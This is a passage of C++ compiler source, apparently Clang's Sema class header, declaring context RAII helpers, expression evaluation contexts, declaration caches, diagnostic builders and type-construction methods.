public:
ContextRAII(Sema &S, DeclContext *ContextToPush, bool NewThisContext = true)
: S(S), SavedContext(S.CurContext),
SavedContextState(S.DelayedDiagnostics.pushUndelayed()),
SavedCXXThisTypeOverride(S.CXXThisTypeOverride)
{
assert(ContextToPush && "pushing null context");
S.CurContext = ContextToPush;
if (NewThisContext)
S.CXXThisTypeOverride = QualType();
}
void pop() {
if (!SavedContext) return;
S.CurContext = SavedContext;
S.DelayedDiagnostics.popUndelayed(SavedContextState);
S.CXXThisTypeOverride = SavedCXXThisTypeOverride;
SavedContext = nullptr;
}
~ContextRAII() {
pop();
}
};
/// Used to change context to isConstantEvaluated without pushing a heavy
/// ExpressionEvaluationContextRecord object.
bool isConstantEvaluatedOverride;
bool isConstantEvaluated() {
return ExprEvalContexts.back().isConstantEvaluated() ||
isConstantEvaluatedOverride;
}
/// RAII object to handle the state changes required to synthesize
/// a function body.
class SynthesizedFunctionScope {
Sema &S;
Sema::ContextRAII SavedContext;
bool PushedCodeSynthesisContext = false;
public:
SynthesizedFunctionScope(Sema &S, DeclContext *DC)
: S(S), SavedContext(S, DC) {
S.PushFunctionScope();
S.PushExpressionEvaluationContext(
Sema::ExpressionEvaluationContext::PotentiallyEvaluated);
if (auto *FD = dyn_cast<FunctionDecl>(DC))
FD->setWillHaveBody(true);
else
assert(isa<ObjCMethodDecl>(DC));
}
void addContextNote(SourceLocation UseLoc) {
assert(!PushedCodeSynthesisContext);
Sema::CodeSynthesisContext Ctx;
Ctx.Kind = Sema::CodeSynthesisContext::DefiningSynthesizedFunction;
Ctx.PointOfInstantiation = UseLoc;
Ctx.Entity = cast<Decl>(S.CurContext);
S.pushCodeSynthesisContext(Ctx);
PushedCodeSynthesisContext = true;
}
~SynthesizedFunctionScope() {
if (PushedCodeSynthesisContext)
S.popCodeSynthesisContext();
if (auto *FD = dyn_cast<FunctionDecl>(S.CurContext))
FD->setWillHaveBody(false);
S.PopExpressionEvaluationContext();
S.PopFunctionScopeInfo();
}
};
/// WeakUndeclaredIdentifiers - Identifiers contained in
/// \#pragma weak before declared. rare. may alias another
/// identifier, declared or undeclared
llvm::MapVector<IdentifierInfo *, WeakInfo> WeakUndeclaredIdentifiers;
/// ExtnameUndeclaredIdentifiers - Identifiers contained in
/// \#pragma redefine_extname before declared. Used in Solaris system headers
/// to define functions that occur in multiple standards to call the version
/// in the currently selected standard.
llvm::DenseMap<IdentifierInfo*,AsmLabelAttr*> ExtnameUndeclaredIdentifiers;
/// Load weak undeclared identifiers from the external source.
void LoadExternalWeakUndeclaredIdentifiers();
/// WeakTopLevelDecl - Translation-unit scoped declarations generated by
/// \#pragma weak during processing of other Decls.
/// I couldn't figure out a clean way to generate these in-line, so
/// we store them here and handle separately -- which is a hack.
/// It would be best to refactor this.
SmallVector<Decl*,2> WeakTopLevelDecl;
IdentifierResolver IdResolver;
/// Translation Unit Scope - useful to Objective-C actions that need
/// to lookup file scope declarations in the "ordinary" C decl namespace.
/// For example, user-defined classes, built-in "id" type, etc.
Scope *TUScope;
/// The C++ "std" namespace, where the standard library resides.
LazyDeclPtr StdNamespace;
/// The C++ "std::bad_alloc" class, which is defined by the C++
/// standard library.
LazyDeclPtr StdBadAlloc;
/// The C++ "std::align_val_t" enum class, which is defined by the C++
/// standard library.
LazyDeclPtr StdAlignValT;
/// The C++ "std::experimental" namespace, where the experimental parts
/// of the standard library resides.
NamespaceDecl *StdExperimentalNamespaceCache;
/// The C++ "std::initializer_list" template, which is defined in
/// \<initializer_list>.
ClassTemplateDecl *StdInitializerList;
/// The C++ "std::coroutine_traits" template, which is defined in
/// \<coroutine_traits>
ClassTemplateDecl *StdCoroutineTraitsCache;
/// The C++ "type_info" declaration, which is defined in \<typeinfo>.
RecordDecl *CXXTypeInfoDecl;
/// The MSVC "_GUID" struct, which is defined in MSVC header files.
RecordDecl *MSVCGuidDecl;
/// Caches identifiers/selectors for NSFoundation APIs.
std::unique_ptr<NSAPI> NSAPIObj;
/// The declaration of the Objective-C NSNumber class.
ObjCInterfaceDecl *NSNumberDecl;
/// The declaration of the Objective-C NSValue class.
ObjCInterfaceDecl *NSValueDecl;
/// Pointer to NSNumber type (NSNumber *).
QualType NSNumberPointer;
/// Pointer to NSValue type (NSValue *).
QualType NSValuePointer;
/// The Objective-C NSNumber methods used to create NSNumber literals.
ObjCMethodDecl *NSNumberLiteralMethods[NSAPI::NumNSNumberLiteralMethods];
/// The declaration of the Objective-C NSString class.
ObjCInterfaceDecl *NSStringDecl;
/// Pointer to NSString type (NSString *).
QualType NSStringPointer;
/// The declaration of the stringWithUTF8String: method.
ObjCMethodDecl *StringWithUTF8StringMethod;
/// The declaration of the valueWithBytes:objCType: method.
ObjCMethodDecl *ValueWithBytesObjCTypeMethod;
/// The declaration of the Objective-C NSArray class.
ObjCInterfaceDecl *NSArrayDecl;
/// The declaration of the arrayWithObjects:count: method.
ObjCMethodDecl *ArrayWithObjectsMethod;
/// The declaration of the Objective-C NSDictionary class.
ObjCInterfaceDecl *NSDictionaryDecl;
/// The declaration of the dictionaryWithObjects:forKeys:count: method.
ObjCMethodDecl *DictionaryWithObjectsMethod;
/// id<NSCopying> type.
QualType QIDNSCopying;
/// will hold 'respondsToSelector:'
Selector RespondsToSelectorSel;
/// A flag to remember whether the implicit forms of operator new and delete
/// have been declared.
bool GlobalNewDeleteDeclared;
/// A flag to indicate that we're in a context that permits abstract
/// references to fields. This is really a
bool AllowAbstractFieldReference;
/// Describes how the expressions currently being parsed are
/// evaluated at run-time, if at all.
enum class ExpressionEvaluationContext {
/// The current expression and its subexpressions occur within an
/// unevaluated operand (C++11 [expr]p7), such as the subexpression of
/// \c sizeof, where the type of the expression may be significant but
/// no code will be generated to evaluate the value of the expression at
/// run time.
Unevaluated,
/// The current expression occurs within a braced-init-list within
/// an unevaluated operand. This is mostly like a regular unevaluated
/// context, except that we still instantiate constexpr functions that are
/// referenced here so that we can perform narrowing checks correctly.
UnevaluatedList,
/// The current expression occurs within a discarded statement.
/// This behaves largely similarly to an unevaluated operand in preventing
/// definitions from being required, but not in other ways.
DiscardedStatement,
/// The current expression occurs within an unevaluated
/// operand that unconditionally permits abstract references to
/// fields, such as a SIZE operator in MS-style inline assembly.
UnevaluatedAbstract,
/// The current context is "potentially evaluated" in C++11 terms,
/// but the expression is evaluated at compile-time (like the values of
/// cases in a switch statement).
ConstantEvaluated,
/// The current expression is potentially evaluated at run time,
/// which means that code may be generated to evaluate the value of the
/// expression at run time.
PotentiallyEvaluated,
/// The current expression is potentially evaluated, but any
/// declarations referenced inside that expression are only used if
/// in fact the current expression is used.
///
/// This value is used when parsing default function arguments, for which
/// we would like to provide diagnostics (e.g., passing non-POD arguments
/// through varargs) but do not want to mark declarations as "referenced"
/// until the default argument is used.
PotentiallyEvaluatedIfUsed
};
/// Data structure used to record current or nested
/// expression evaluation contexts.
struct ExpressionEvaluationContextRecord {
/// The expression evaluation context.
ExpressionEvaluationContext Context;
/// Whether the enclosing context needed a cleanup.
CleanupInfo ParentCleanup;
/// Whether we are in a decltype expression.
bool IsDecltype;
/// The number of active cleanup objects when we entered
/// this expression evaluation context.
unsigned NumCleanupObjects;
/// The number of typos encountered during this expression evaluation
/// context (i.e. the number of TypoExprs created).
unsigned NumTypos;
MaybeODRUseExprSet SavedMaybeODRUseExprs;
/// The lambdas that are present within this context, if it
/// is indeed an unevaluated context.
SmallVector<LambdaExpr *, 2> Lambdas;
/// The declaration that provides context for lambda expressions
/// and block literals if the normal declaration context does not
/// suffice, e.g., in a default function argument.
Decl *ManglingContextDecl;
/// If we are processing a decltype type, a set of call expressions
/// for which we have deferred checking the completeness of the return type.
SmallVector<CallExpr *, 8> DelayedDecltypeCalls;
/// If we are processing a decltype type, a set of temporary binding
/// expressions for which we have deferred checking the destructor.
SmallVector<CXXBindTemporaryExpr *, 8> DelayedDecltypeBinds;
llvm::SmallPtrSet<const Expr *, 8> PossibleDerefs;
/// Expressions appearing as the LHS of a volatile assignment in this
/// context. We produce a warning for these when popping the context if
/// they are not discarded-value expressions nor unevaluated operands.
SmallVector<Expr*, 2> VolatileAssignmentLHSs;
/// \brief Describes whether we are in an expression constext which we have
/// to handle differently.
enum ExpressionKind {
EK_Decltype, EK_TemplateArgument, EK_Other
} ExprContext;
ExpressionEvaluationContextRecord(ExpressionEvaluationContext Context,
unsigned NumCleanupObjects,
CleanupInfo ParentCleanup,
Decl *ManglingContextDecl,
ExpressionKind ExprContext)
: Context(Context), ParentCleanup(ParentCleanup),
NumCleanupObjects(NumCleanupObjects), NumTypos(0),
ManglingContextDecl(ManglingContextDecl), ExprContext(ExprContext) {}
bool isUnevaluated() const {
return Context == ExpressionEvaluationContext::Unevaluated ||
Context == ExpressionEvaluationContext::UnevaluatedAbstract ||
Context == ExpressionEvaluationContext::UnevaluatedList;
}
bool isConstantEvaluated() const {
return Context == ExpressionEvaluationContext::ConstantEvaluated;
}
};
/// A stack of expression evaluation contexts.
SmallVector<ExpressionEvaluationContextRecord, 8> ExprEvalContexts;
/// Emit a warning for all pending noderef expressions that we recorded.
void WarnOnPendingNoDerefs(ExpressionEvaluationContextRecord &Rec);
/// Compute the mangling number context for a lambda expression or
/// block literal. Also return the extra mangling decl if any.
///
/// \param DC - The DeclContext containing the lambda expression or
/// block literal.
std::tuple<MangleNumberingContext *, Decl *>
getCurrentMangleNumberContext(const DeclContext *DC);
/// SpecialMemberOverloadResult - The overloading result for a special member
/// function.
///
/// This is basically a wrapper around PointerIntPair. The lowest bits of the
/// integer are used to determine whether overload resolution succeeded.
class SpecialMemberOverloadResult {
public:
enum Kind {
NoMemberOrDeleted,
Ambiguous,
Success
};
private:
llvm::PointerIntPair<CXXMethodDecl*, 2> Pair;
public:
SpecialMemberOverloadResult() : Pair() {}
SpecialMemberOverloadResult(CXXMethodDecl *MD)
: Pair(MD, MD->isDeleted() ? NoMemberOrDeleted : Success) {}
CXXMethodDecl *getMethod() const { return Pair.getPointer(); }
void setMethod(CXXMethodDecl *MD) { Pair.setPointer(MD); }
Kind getKind() const { return static_cast<Kind>(Pair.getInt()); }
void setKind(Kind K) { Pair.setInt(K); }
};
class SpecialMemberOverloadResultEntry
: public llvm::FastFoldingSetNode,
public SpecialMemberOverloadResult {
public:
SpecialMemberOverloadResultEntry(const llvm::FoldingSetNodeID &ID)
: FastFoldingSetNode(ID)
{}
};
/// A cache of special member function overload resolution results
/// for C++ records.
llvm::FoldingSet<SpecialMemberOverloadResultEntry> SpecialMemberCache;
/// A cache of the flags available in enumerations with the flag_bits
/// attribute.
mutable llvm::DenseMap<const EnumDecl*, llvm::APInt> FlagBitsCache;
/// The kind of translation unit we are processing.
///
/// When we're processing a complete translation unit, Sema will perform
/// end-of-translation-unit semantic tasks (such as creating
/// initializers for tentative definitions in C) once parsing has
/// completed. Modules and precompiled headers perform different kinds of
/// checks.
TranslationUnitKind TUKind;
llvm::BumpPtrAllocator BumpAlloc;
/// The number of SFINAE diagnostics that have been trapped.
unsigned NumSFINAEErrors;
typedef llvm::DenseMap<ParmVarDecl *, llvm::TinyPtrVector<ParmVarDecl *>>
UnparsedDefaultArgInstantiationsMap;
/// A mapping from parameters with unparsed default arguments to the
/// set of instantiations of each parameter.
///
/// This mapping is a temporary data structure used when parsing
/// nested class templates or nested classes of class templates,
/// where we might end up instantiating an inner class before the
/// default arguments of its methods have been parsed.
UnparsedDefaultArgInstantiationsMap UnparsedDefaultArgInstantiations;
// Contains the locations of the beginning of unparsed default
// argument locations.
llvm::DenseMap<ParmVarDecl *, SourceLocation> UnparsedDefaultArgLocs;
/// UndefinedInternals - all the used, undefined objects which require a
/// definition in this translation unit.
llvm::MapVector<NamedDecl *, SourceLocation> UndefinedButUsed;
/// Determine if VD, which must be a variable or function, is an external
/// symbol that nonetheless can't be referenced from outside this translation
/// unit because its type has no linkage and it's not extern "C".
bool isExternalWithNoLinkageType(ValueDecl *VD);
/// Obtain a sorted list of functions that are undefined but ODR-used.
void getUndefinedButUsed(
SmallVectorImpl<std::pair<NamedDecl *, SourceLocation> > &Undefined);
/// Retrieves list of suspicious delete-expressions that will be checked at
/// the end of translation unit.
const llvm::MapVector<FieldDecl *, DeleteLocs> &
getMismatchingDeleteExpressions() const;
typedef std::pair<ObjCMethodList, ObjCMethodList> GlobalMethods;
typedef llvm::DenseMap<Selector, GlobalMethods> GlobalMethodPool;
/// Method Pool - allows efficient lookup when typechecking messages to "id".
/// We need to maintain a list, since selectors can have differing signatures
/// across classes. In Cocoa, this happens to be extremely uncommon (only 1%
/// of selectors are "overloaded").
/// At the head of the list it is recorded whether there were 0, 1, or >= 2
/// methods inside categories with a particular selector.
GlobalMethodPool MethodPool;
/// Method selectors used in a \@selector expression. Used for implementation
/// of -Wselector.
llvm::MapVector<Selector, SourceLocation> ReferencedSelectors;
/// List of SourceLocations where 'self' is implicitly retained inside a
/// block.
llvm::SmallVector<std::pair<SourceLocation, const BlockDecl *>, 1>
ImplicitlyRetainedSelfLocs;
/// Kinds of C++ special members.
enum CXXSpecialMember {
CXXDefaultConstructor,
CXXCopyConstructor,
CXXMoveConstructor,
CXXCopyAssignment,
CXXMoveAssignment,
CXXDestructor,
CXXInvalid
};
typedef llvm::PointerIntPair<CXXRecordDecl *, 3, CXXSpecialMember>
SpecialMemberDecl;
/// The C++ special members which we are currently in the process of
/// declaring. If this process recursively triggers the declaration of the
/// same special member, we should act as if it is not yet declared.
llvm::SmallPtrSet<SpecialMemberDecl, 4> SpecialMembersBeingDeclared;
/// Kinds of defaulted comparison operator functions.
enum class DefaultedComparisonKind : unsigned char {
/// This is not a defaultable comparison operator.
None,
/// This is an operator== that should be implemented as a series of
/// subobject comparisons.
Equal,
/// This is an operator<=> that should be implemented as a series of
/// subobject comparisons.
ThreeWay,
/// This is an operator!= that should be implemented as a rewrite in terms
/// of a == comparison.
NotEqual,
/// This is an <, <=, >, or >= that should be implemented as a rewrite in
/// terms of a <=> comparison.
Relational,
};
/// The function definitions which were renamed as part of typo-correction
/// to match their respective declarations. We want to keep track of them
/// to ensure that we don't emit a "redefinition" error if we encounter a
/// correctly named definition after the renamed definition.
llvm::SmallPtrSet<const NamedDecl *, 4> TypoCorrectedFunctionDefinitions;
/// Stack of types that correspond to the parameter entities that are
/// currently being copy-initialized. Can be empty.
llvm::SmallVector<QualType, 4> CurrentParameterCopyTypes;
void ReadMethodPool(Selector Sel);
void updateOutOfDateSelector(Selector Sel);
/// Private Helper predicate to check for 'self'.
bool isSelfExpr(Expr *RExpr);
bool isSelfExpr(Expr *RExpr, const ObjCMethodDecl *Method);
/// Cause the active diagnostic on the DiagosticsEngine to be
/// emitted. This is closely coupled to the SemaDiagnosticBuilder class and
/// should not be used elsewhere.
void EmitCurrentDiagnostic(unsigned DiagID);
/// Records and restores the FP_CONTRACT state on entry/exit of compound
/// statements.
class FPContractStateRAII {
public:
FPContractStateRAII(Sema &S) : S(S), OldFPFeaturesState(S.FPFeatures) {}
~FPContractStateRAII() { S.FPFeatures = OldFPFeaturesState; }
private:
Sema& S;
FPOptions OldFPFeaturesState;
};
void addImplicitTypedef(StringRef Name, QualType T);
bool WarnedStackExhausted = false;
public:
Sema(Preprocessor &pp, ASTContext &ctxt, ASTConsumer &consumer,
TranslationUnitKind TUKind = TU_Complete,
CodeCompleteConsumer *CompletionConsumer = nullptr);
~Sema();
/// Perform initialization that occurs after the parser has been
/// initialized but before it parses anything.
void Initialize();
const LangOptions &getLangOpts() const { return LangOpts; }
OpenCLOptions &getOpenCLOptions() { return OpenCLFeatures; }
FPOptions &getFPOptions() { return FPFeatures; }
DiagnosticsEngine &getDiagnostics() const { return Diags; }
SourceManager &getSourceManager() const { return SourceMgr; }
Preprocessor &getPreprocessor() const { return PP; }
ASTContext &getASTContext() const { return Context; }
ASTConsumer &getASTConsumer() const { return Consumer; }
ASTMutationListener *getASTMutationListener() const;
ExternalSemaSource* getExternalSource() const { return ExternalSource; }
///Registers an external source. If an external source already exists,
/// creates a multiplex external source and appends to it.
///
///\param[in] E - A non-null external sema source.
///
void addExternalSource(ExternalSemaSource *E);
void PrintStats() const;
/// Warn that the stack is nearly exhausted.
void warnStackExhausted(SourceLocation Loc);
/// Run some code with "sufficient" stack space. (Currently, at least 256K is
/// guaranteed). Produces a warning if we're low on stack space and allocates
/// more in that case. Use this in code that may recurse deeply (for example,
/// in template instantiation) to avoid stack overflow.
void runWithSufficientStackSpace(SourceLocation Loc,
llvm::function_ref<void()> Fn);
/// Helper class that creates diagnostics with optional
/// template instantiation stacks.
///
/// This class provides a wrapper around the basic DiagnosticBuilder
/// class that emits diagnostics. SemaDiagnosticBuilder is
/// responsible for emitting the diagnostic (as DiagnosticBuilder
/// does) and, if the diagnostic comes from inside a template
/// instantiation, printing the template instantiation stack as
/// well.
class SemaDiagnosticBuilder : public DiagnosticBuilder {
Sema &SemaRef;
unsigned DiagID;
public:
SemaDiagnosticBuilder(DiagnosticBuilder &DB, Sema &SemaRef, unsigned DiagID)
: DiagnosticBuilder(DB), SemaRef(SemaRef), DiagID(DiagID) { }
// This is a cunning lie. DiagnosticBuilder actually performs move
// construction in its copy constructor (but due to varied uses, it's not
// possible to conveniently express this as actual move construction). So
// the default copy ctor here is fine, because the base class disables the
// source anyway, so the user-defined ~SemaDiagnosticBuilder is a safe no-op
// in that case anwyay.
SemaDiagnosticBuilder(const SemaDiagnosticBuilder&) = default;
~SemaDiagnosticBuilder() {
// If we aren't active, there is nothing to do.
if (!isActive()) return;
// Otherwise, we need to emit the diagnostic. First flush the underlying
// DiagnosticBuilder data, and clear the diagnostic builder itself so it
// won't emit the diagnostic in its own destructor.
//
// This seems wasteful, in that as written the DiagnosticBuilder dtor will
// do its own needless checks to see if the diagnostic needs to be
// emitted. However, because we take care to ensure that the builder
// objects never escape, a sufficiently smart compiler will be able to
// eliminate that code.
FlushCounts();
Clear();
// Dispatch to Sema to emit the diagnostic.
SemaRef.EmitCurrentDiagnostic(DiagID);
}
/// Teach operator<< to produce an object of the correct type.
template<typename T>
friend const SemaDiagnosticBuilder &operator<<(
const SemaDiagnosticBuilder &Diag, const T &Value) {
const DiagnosticBuilder &BaseDiag = Diag;
BaseDiag << Value;
return Diag;
}
};
/// Emit a diagnostic.
SemaDiagnosticBuilder Diag(SourceLocation Loc, unsigned DiagID) {
DiagnosticBuilder DB = Diags.Report(Loc, DiagID);
return SemaDiagnosticBuilder(DB, *this, DiagID);
}
/// Emit a partial diagnostic.
SemaDiagnosticBuilder Diag(SourceLocation Loc, const PartialDiagnostic& PD);
/// Build a partial diagnostic.
PartialDiagnostic PDiag(unsigned DiagID = 0); // in SemaInternal.h
bool findMacroSpelling(SourceLocation &loc, StringRef name);
/// Get a string to suggest for zero-initialization of a type.
std::string
getFixItZeroInitializerForType(QualType T, SourceLocation Loc) const;
std::string getFixItZeroLiteralForType(QualType T, SourceLocation Loc) const;
/// Calls \c Lexer::getLocForEndOfToken()
SourceLocation getLocForEndOfToken(SourceLocation Loc, unsigned Offset = 0);
/// Retrieve the module loader associated with the preprocessor.
ModuleLoader &getModuleLoader() const;
void emitAndClearUnusedLocalTypedefWarnings();
enum TUFragmentKind {
/// The global module fragment, between 'module;' and a module-declaration.
Global,
/// A normal translation unit fragment. For a non-module unit, this is the
/// entire translation unit. Otherwise, it runs from the module-declaration
/// to the private-module-fragment (if any) or the end of the TU (if not).
Normal,
/// The private module fragment, between 'module :private;' and the end of
/// the translation unit.
Private
};
void ActOnStartOfTranslationUnit();
void ActOnEndOfTranslationUnit();
void ActOnEndOfTranslationUnitFragment(TUFragmentKind Kind);
void CheckDelegatingCtorCycles();
Scope *getScopeForContext(DeclContext *Ctx);
void PushFunctionScope();
void PushBlockScope(Scope *BlockScope, BlockDecl *Block);
sema::LambdaScopeInfo *PushLambdaScope();
/// This is used to inform Sema what the current TemplateParameterDepth
/// is during Parsing. Currently it is used to pass on the depth
/// when parsing generic lambda 'auto' parameters.
void RecordParsingTemplateParameterDepth(unsigned Depth);
void PushCapturedRegionScope(Scope *RegionScope, CapturedDecl *CD,
RecordDecl *RD, CapturedRegionKind K,
unsigned OpenMPCaptureLevel = 0);
/// Custom deleter to allow FunctionScopeInfos to be kept alive for a short
/// time after they've been popped.
class PoppedFunctionScopeDeleter {
Sema *Self;
public:
explicit PoppedFunctionScopeDeleter(Sema *Self) : Self(Self) {}
void operator()(sema::FunctionScopeInfo *Scope) const;
};
using PoppedFunctionScopePtr =
std::unique_ptr<sema::FunctionScopeInfo, PoppedFunctionScopeDeleter>;
PoppedFunctionScopePtr
PopFunctionScopeInfo(const sema::AnalysisBasedWarnings::Policy *WP = nullptr,
const Decl *D = nullptr,
QualType BlockType = QualType());
sema::FunctionScopeInfo *getCurFunction() const {
return FunctionScopes.empty() ? nullptr : FunctionScopes.back();
}
sema::FunctionScopeInfo *getEnclosingFunction() const;
void setFunctionHasBranchIntoScope();
void setFunctionHasBranchProtectedScope();
void setFunctionHasIndirectGoto();
void PushCompoundScope(bool IsStmtExpr);
void PopCompoundScope();
sema::CompoundScopeInfo &getCurCompoundScope() const;
bool hasAnyUnrecoverableErrorsInThisFunction() const;
/// Retrieve the current block, if any.
sema::BlockScopeInfo *getCurBlock();
/// Get the innermost lambda enclosing the current location, if any. This
/// looks through intervening non-lambda scopes such as local functions and
/// blocks.
sema::LambdaScopeInfo *getEnclosingLambda() const;
/// Retrieve the current lambda scope info, if any.
/// \param IgnoreNonLambdaCapturingScope true if should find the top-most
/// lambda scope info ignoring all inner capturing scopes that are not
/// lambda scopes.
sema::LambdaScopeInfo *
getCurLambda(bool IgnoreNonLambdaCapturingScope = false);
/// Retrieve the current generic lambda info, if any.
sema::LambdaScopeInfo *getCurGenericLambda();
/// Retrieve the current captured region, if any.
sema::CapturedRegionScopeInfo *getCurCapturedRegion();
/// WeakTopLevelDeclDecls - access to \#pragma weak-generated Decls
SmallVectorImpl<Decl *> &WeakTopLevelDecls() { return WeakTopLevelDecl; }
void ActOnComment(SourceRange Comment);
//===--------------------------------------------------------------------===//
// Type Analysis / Processing: SemaType.cpp.
//
QualType BuildQualifiedType(QualType T, SourceLocation Loc, Qualifiers Qs,
const DeclSpec *DS = nullptr);
QualType BuildQualifiedType(QualType T, SourceLocation Loc, unsigned CVRA,
const DeclSpec *DS = nullptr);
QualType BuildPointerType(QualType T,
SourceLocation Loc, DeclarationName Entity);
QualType BuildReferenceType(QualType T, bool LValueRef,
SourceLocation Loc, DeclarationName Entity);
QualType BuildArrayType(QualType T, ArrayType::ArraySizeModifier ASM,
Expr *ArraySize, unsigned Quals,
SourceRange Brackets, DeclarationName Entity);
QualType BuildVectorType(QualType T, Expr *VecSize, SourceLocation AttrLoc);
QualType BuildExtVectorType(QualType T, Expr *ArraySize,
SourceLocation AttrLoc);
QualType BuildAddressSpaceAttr(QualType &T, LangAS ASIdx, Expr *AddrSpace,
SourceLocation AttrLoc);
/// Same as above, but constructs the AddressSpace index if not provided.
QualType BuildAddressSpaceAttr(QualType &T, Expr *AddrSpace,
SourceLocation AttrLoc);
bool CheckQualifiedFunctionForTypeId(QualType T, SourceLocation Loc);
bool CheckFunctionReturnType(QualType T, SourceLocation Loc);
/// Build a function type.
///
/// This routine checks the function type according to C++ rules and
/// under the assumption that the result type and parameter types have
/// just been instantiated from a template. It therefore duplicates
/// some of the behavior of GetTypeForDeclarator, but in a much
/// simpler form that is only suitable for this narrow use case.
///
/// \param T The return type of the function.
///
/// \param ParamTypes The parameter types of the function. This array
/// will be modified to account for adjustments to the types of the
/// function parameters.
///
/// \param Loc The location of the entity whose type involves this
/// function type or, if there is no such entity, the location of the
/// type that will have function type.
///
/// \param Entity The name of the entity that involves the function
/// type, if known.
///
/// \param EPI Extra information about the function type. Usually this will
/// be taken from an existing function with the same prototype.
///
/// \returns A suitable function type, if there are no errors. The
/// unqualified type will always be a FunctionProtoType.
/// Otherwise, returns a NULL type.
QualType BuildFunctionType(QualType T,
MutableArrayRef<QualType> ParamTypes,
SourceLocation Loc, DeclarationName Entity,
const FunctionProtoType::ExtProtoInfo &EPI);
QualType BuildMemberPointerType(QualType T, QualType Class,
SourceLocation Loc,
DeclarationName Entity);
QualType BuildBlockPointerType(QualType T,
SourceLocation Loc, DeclarationName Entity);
QualType BuildParenType(QualType T);
QualType BuildAtomicType(QualType T, SourceLocation Loc);
QualType BuildReadPipeType(QualType T,
SourceLocation Loc);
QualType BuildWritePipeType(QualType T,
SourceLocation Loc);
TypeSourceInfo *GetTypeForDeclarator(Declarator &D, Scope *S);
TypeSourceInfo *GetTypeForDeclaratorCast(Declarator &D, QualType FromTy);
/// Package the given type and TSI into a ParsedType.
ParsedType CreateParsedType(QualType T, TypeSourceInfo *TInfo);
DeclarationNameInfo GetNameForDeclarator(Declarator &D);
DeclarationNameInfo GetNameFromUnqualifiedId(const UnqualifiedId &Name);
static QualType GetTypeFromParser(ParsedType Ty,
TypeSourceInfo **TInfo = nullptr);
CanThrowResult canThrow(const Stmt *E);
const FunctionProtoType *ResolveExceptionSpec(SourceLocation Loc,
const FunctionProtoType *FPT);
void UpdateExceptionSpec(FunctionDecl *FD,
const FunctionProtoType::ExceptionSpecInfo &ESI);
bool CheckSpecifiedExceptionType(QualType &T, SourceRange Range);
bool CheckDistantExceptionSpec(QualType T);
bool CheckEquivalentExceptionSpec(FunctionDecl *Old, FunctionDecl *New);
bool CheckEquivalentExceptionSpec(
const FunctionProtoType *Old, SourceLocation OldLoc,
const FunctionProtoType *New, SourceLocation NewLoc);
bool CheckEquivalentExceptionSpec(
const PartialDiagnostic &DiagID, const PartialDiagnostic & NoteID,
const FunctionProtoType *Old, SourceLocation OldLoc,
const FunctionProtoType *New, SourceLocation NewLoc);
bool handlerCanCatch(QualType HandlerType, QualType ExceptionType);
bool CheckExceptionSpecSubset(const PartialDiagnostic &DiagID,
const PartialDiagnostic &NestedDiagID,
const PartialDiagnostic &NoteID,
const PartialDiagnostic &NoThrowDiagID,
const FunctionProtoType *Superset,
SourceLocation SuperLoc,
const FunctionProtoType *Subset,
SourceLocation SubLoc);
bool CheckParamExceptionSpec(const PartialDiagnostic &NestedDiagID,
const PartialDiagnostic &NoteID,
const FunctionProtoType *Target,
SourceLocation TargetLoc,
const FunctionProtoType *Source,
SourceLocation SourceLoc);
TypeResult ActOnTypeName(Scope *S, Declarator &D);
/// The parser has parsed the context-sensitive type 'instancetype'
/// in an Objective-C message declaration. Return the appropriate type.
ParsedType ActOnObjCInstanceType(SourceLocation Loc);
/// Abstract class used to diagnose incomplete types.
struct TypeDiagnoser {
TypeDiagnoser() {}
virtual void diagnose(Sema &S, SourceLocation Loc, QualType T) = 0;
virtual ~TypeDiagnoser() {}
};
static int getPrintable(int I) { return I; }
static unsigned getPrintable(unsigned I) { return I; }
static bool getPrintable(bool B) { return B; }
static const char * getPrintable(const char *S) { return S; }
static StringRef getPrintable(StringRef S) { return S; }
static const std::string &getPrintable(const std::string &S) { return S; }
static const IdentifierInfo *getPrintable(const IdentifierInfo *II) {
return II;
}
static DeclarationName getPrintable(DeclarationName N) { return N; }
static QualType getPrintable(QualType T) { return T; }
static SourceRange getPrintable(SourceRange R) { return R; }
static SourceRange getPrintable(SourceLocation L) { return L; }
static SourceRange getPrintable(const Expr *E) { return E->getSourceRange(); }
static SourceRange getPrintable(TypeLoc TL) { return TL.getSourceRange();}
template <typename... Ts> class BoundTypeDiagnoser : public TypeDiagnoser {
unsigned DiagID;
std::tuple<const Ts &...> Args;
template <std::size_t... Is>
void emit(const SemaDiagnosticBuilder &DB,
std::index_sequence<Is...>) const {
// Apply all tuple elements to the builder in order.
bool Dummy[] = {false, (DB << getPrintable(std::get<Is>(Args)))...};
(void)Dummy;
}
public:
BoundTypeDiagnoser(unsigned DiagID, const Ts &...Args)
: TypeDiagnoser(), DiagID(DiagID), Args(Args...) {
assert(DiagID != 0 && "no diagnostic for type diagnoser");
}
void diagnose(Sema &S, SourceLocation Loc, QualType T) override {
const SemaDiagnosticBuilder &DB = S.Diag(Loc, DiagID);
emit(DB, std::index_sequence_for<Ts...>());
DB << T;
}
};
/// Do a check to make sure \p Name looks like a legal swift_name
/// attribute for the decl \p D. Raise a diagnostic if the name is invalid
/// for the given declaration.
///
/// For a function, this will validate a compound Swift name,
/// e.g. <code>init(foo:bar:baz:)</code> or <code>controllerForName(_:)</code>,
/// and the function will output the number of parameter names, and whether
/// this is a single-arg initializer.
///
/// For a type, enum constant, property, or variable declaration, this will
/// validate either a simple identifier, or a qualified
/// <code>context.identifier</code> name.
///
/// \returns true if the name is a valid swift name for \p D, false otherwise.
bool DiagnoseSwiftName(Decl *D, StringRef Name,
SourceLocation ArgLoc,
const IdentifierInfo *AttrName);
private:
/// Methods for marking which expressions involve dereferencing a pointer
/// marked with the 'noderef' attribute. Expressions are checked bottom up as
/// they are parsed, meaning that a noderef pointer may not be accessed. For
/// example, in `&*p` where `p` is a noderef pointer, we will first parse the
/// `*p`, but need to check that `address of` is called on it. This requires
/// keeping a container of all pending expressions and checking if the address
/// of them are eventually taken.
void CheckSubscriptAccessOfNoDeref(const ArraySubscriptExpr *E);
void CheckAddressOfNoDeref(const Expr *E);
void CheckMemberAccessOfNoDeref(const MemberExpr *E);
bool RequireCompleteTypeImpl(SourceLocation Loc, QualType T,
TypeDiagnoser *Diagnoser);
struct ModuleScope {
SourceLocation BeginLoc;
clang::Module *Module = nullptr;
bool ModuleInterface = false;
bool ImplicitGlobalModuleFragment = false;
VisibleModuleSet OuterVisibleModules;
};
/// The modules we're currently parsing.
llvm::SmallVector<ModuleScope, 16> ModuleScopes;
/// Namespace definitions that we will export when they finish.
llvm::SmallPtrSet<const NamespaceDecl*, 8> DeferredExportedNamespaces;
/// Get the module whose scope we are currently within.
